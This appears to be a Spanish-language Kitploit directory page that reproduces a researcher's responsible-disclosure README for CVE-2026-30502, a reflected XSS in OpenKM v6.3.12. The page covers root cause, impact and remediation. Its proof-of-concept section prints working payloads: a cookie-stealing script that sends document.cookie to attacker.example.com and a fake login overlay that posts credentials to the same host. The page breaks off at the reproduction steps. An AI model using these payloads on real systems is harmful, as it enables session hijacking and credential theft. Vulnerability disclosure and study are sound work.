Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — Documentación y prueba de concepto para CVE-2026-30502, una vulnerabilidad XSS reflejado en OpenKM v6.3.12. Incluye análisis técnico, causa raíz, evaluación de impacto y orientación de remediación para investigadores de seguridad y probadores de penetración. | Kitploit
Herramientas/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
Herramientas de PhishingAnálisis de VulnerabilidadesExplotación de Aplicaciones WebPruebas de PenetraciónPapers e InvestigaciónAprendizaje y Educación
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Documentación y prueba de concepto para CVE-2026-30502, una vulnerabilidad XSS reflejado en OpenKM v6.3.12. Incluye análisis técnico, causa raíz, evaluación de impacto y orientación de remediación para investigadores de seguridad y probadores de penetración.

Ver Repositorio
26hace 3 mesesAún no revisado

🛡️ CVE-2026-30502 — XSS Reflejado en OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Descubierto e informado por Dharmendra Kumar — Investigador de Seguridad

Ciberseguridad | Pruebas de Penetración | Investigación de Vulnerabilidades | Divulgación Responsable


📌 Tabla de Contenidos

  • Resumen
  • Detalles del CVE
  • Producto Afectado
  • Descripción de la Vulnerabilidad
  • Análisis de Causa Raíz
  • Impacto y Evaluación de Riesgos
  • Prueba de Concepto (PoC)
  • Remediación y Recomendaciones
  • Cronograma de Divulgación
  • Referencias
  • Acerca del Investigador

🔍 Resumen

Este repositorio documenta la divulgación responsable de CVE-2026-30502, una vulnerabilidad de Cross-Site Scripting Reflejado (XSS) identificada en OpenKM v6.3.12 — un sistema de gestión documental de código abierto ampliamente utilizado en entornos empresariales y gubernamentales.

La vulnerabilidad existe en el parámetro Content, que refleja la entrada proporcionada por el usuario de vuelta al navegador sin una sanitización o codificación de salida adecuada. Un atacante puede crear una URL maliciosa que contenga JavaScript incrustado y engañar a una víctima para que haga clic en ella, lo que resulta en la ejecución del script dentro de la sesión del navegador de la víctima.

⚠️ Gravedad: Medio–Alto | Vector de Ataque: Red | Privilegios Requeridos: Ninguno | Interacción del Usuario: Requerida


📋 Detalles del CVE

CampoDetalles
ID CVECVE-2026-30502
ProductoOpenKM
Versión Afectadav6.3.12
Clase de VulnerabilidadCross-Site Scripting Reflejado (XSS)
Parámetro VulnerableContent
CWECWE-79: Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web
Vector CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
GravedadMedio–Alto
EditorPrograma CVE de MITRE
InvestigadorDharmendra Kumar
Tipo de DivulgaciónResponsable / Coordinada

📦 Producto Afectado

OpenKM es un sistema de gestión documental (DMS) gratuito y de código abierto que proporciona una interfaz web para gestionar, auditar y distribuir documentos empresariales. Es utilizado por empresas, organismos gubernamentales e instituciones educativas en todo el mundo.

  • Nombre del Producto: Sistema de Gestión Documental OpenKM
  • Versión Afectada: v6.3.12
  • Sitio Web del Proveedor: https://www.openkm.com
  • Categoría: Sistema de Gestión Documental (DMS)
  • Lenguaje / Stack: Java (JSP / Spring Framework)

🧨 Descripción de la Vulnerabilidad

Se identificó una vulnerabilidad de Cross-Site Scripting Reflejado (XSS) en OpenKM v6.3.12 a través del parámetro Content. La aplicación no valida ni codifica la entrada proporcionada por el usuario antes de reflejarla en el cuerpo de la respuesta HTTP, lo que permite inyectar y ejecutar JavaScript arbitrario en el navegador de la víctima.

A diferencia del XSS Almacenado, la carga útil del XSS Reflejado no se persiste en la base de datos — en su lugar, viaja dentro de una URL manipulada. El ataque depende de que la víctima sea engañada para hacer clic en un enlace malicioso (entregado por correo electrónico, redes sociales o campañas de phishing), tras lo cual la carga útil se ejecuta silenciosamente en su navegador con el contexto de la sesión de la víctima.

Flujo del Ataque

El atacante crea una URL maliciosa
        │
        ▼
La víctima hace clic en el enlace (phishing / ingeniería social)
        │
        ▼
El navegador envía una solicitud GET/POST con la carga útil en el parámetro `Content`
        │
        ▼
OpenKM refleja la entrada sin sanitizar directamente en la respuesta HTML
        │
        ▼
El navegador analiza y ejecuta el JavaScript inyectado
        │
        ▼
Sesión secuestrada / credenciales robadas / cuenta comprometida

🔬 Análisis de Causa Raíz

La vulnerabilidad se debe a que la aplicación no aplica controles de seguridad de entrada-salida en el parámetro Content:

DebilidadDescripción
❌ Sin Validación de EntradaEl parámetro Content acepta caracteres HTML/JavaScript sin restricción ni filtrado
❌ Sin Codificación de SalidaLos valores reflejados se escriben en la respuesta HTML sin codificación de entidades HTML
❌ Falta de Cabecera CSPNo se aplica una Política de Seguridad de Contenido para bloquear la ejecución de scripts en línea
❌ Sin Cookies HTTPOnlyLos tokens de sesión son accesibles vía JavaScript, permitiendo el robo directo de cookies
URL creada por el usuario ──► Parámetro Content ──► [SIN Validación]
       ──► Reflejado en la Respuesta HTML ──► [SIN Codificación]
              ──► El Navegador Ejecuta el Script ──► Cuenta Comprometida

💥 Impacto y Evaluación de Riesgos

Una explotación exitosa de esta vulnerabilidad puede llevar a:

RiesgoDescripción
🍪 Secuestro de SesiónRobar tokens de sesión activos mediante document.cookie para suplantar a la víctima
🔑 Robo de CredencialesInyectar superposiciones falsas de inicio de sesión para capturar nombres de usuario y contraseñas en texto plano
📤 Divulgación de InformaciónExfiltrar contenido de documentos sensibles, datos de usuario o configuraciones internas
🎣 Ataques de PhishingServir páginas falsas convincentes alojadas dentro del dominio confiable de OpenKM
👤 Toma de CuentasRealizar acciones autenticadas arbitrarias en nombre de la víctima
⚙️ Acciones No AutorizadasModificar, eliminar o exfiltrar documentos dentro del DMS
🖥️ Distribución de MalwareRedirigir a las víctimas a sitios controlados por el atacante que alojan descargas maliciosas

🧪 Prueba de Concepto (PoC)

⚠️ Aviso: La siguiente información se comparte estrictamente con fines educativos y de investigación en seguridad bajo los principios de divulgación responsable. No pruebe ni utilice esto contra sistemas que no posea o para los cuales no tenga autorización explícita por escrito.

Ejemplos de Carga Útil (Genéricos)

// Prueba básica de ejecución
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Exfiltración de cookie de sesión
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Superposición de phishing de credenciales
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Usuario"/>'
    +'<input name="p" type="password" placeholder="Contraseña"/>'
    +'<button>Iniciar Sesión</button></form>';
  document.body.prepend(d);
</script>

Estructura de URL Maliciosa Manipulada

https://instancia-openkm-objetivo/[endpoint-vulnerable]?Content=<script>alert(1)</script>

Pasos para Reproducir

Descargar herramienta